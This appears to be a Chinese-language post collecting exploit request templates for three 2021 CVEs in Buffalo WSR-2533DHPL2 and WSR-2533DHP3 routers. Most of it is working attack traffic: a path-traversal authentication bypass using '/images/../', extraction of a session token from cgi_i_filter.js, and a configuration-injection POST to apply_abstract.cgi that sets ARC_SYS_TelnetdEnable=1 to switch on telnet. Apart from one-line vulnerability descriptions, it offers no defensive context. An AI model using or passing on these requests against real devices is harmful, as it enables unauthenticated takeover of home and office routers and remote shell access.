CVE-2021-20090
Buffalo WSR-2533DHPL2 - 路径遍历
Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 <= 1.24 的 Web 界面中的路径遍历漏洞可能允许未经身份验证的远程攻击者绕过身份验证。
代码语言:javascript复制GET /images/../info.html HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/info.html
CVE-2021-20092
Buffalo WSR-2533DHPL2 - 未授权访问
Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 <= 1.24 的 Web 界面没有正确限制未经授权的参与者访问敏感信息。
代码语言:javascript复制 GET /images/../info.html HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/info.html
- |
GET /images/../cgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1
Host: {{Hostname}}
Cookie: lang=8; url=ping.html; mobile=false;
Referer: {{BaseURL}}/info.html
Content-Type: application/x-www-form-urlencoded
CVE-2021-20091
Buffalo WSR-2533DHPL2 - 配置文件注入
Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 <= 1.24 的 Web 界面无法正确清理用户输入。经过身份验证的远程攻击者可以利用此漏洞来更改设备配置,从而有可能获得远程代码执行。
代码语言:javascript复制 GET /images/../info.html HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/info.html
POST /images/../apply_abstract.cgi HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/info.html
Content-Type: application/x-www-form-urlencoded
action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time=5&ARC_ping_ipaddress=127.0.0.1
ARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4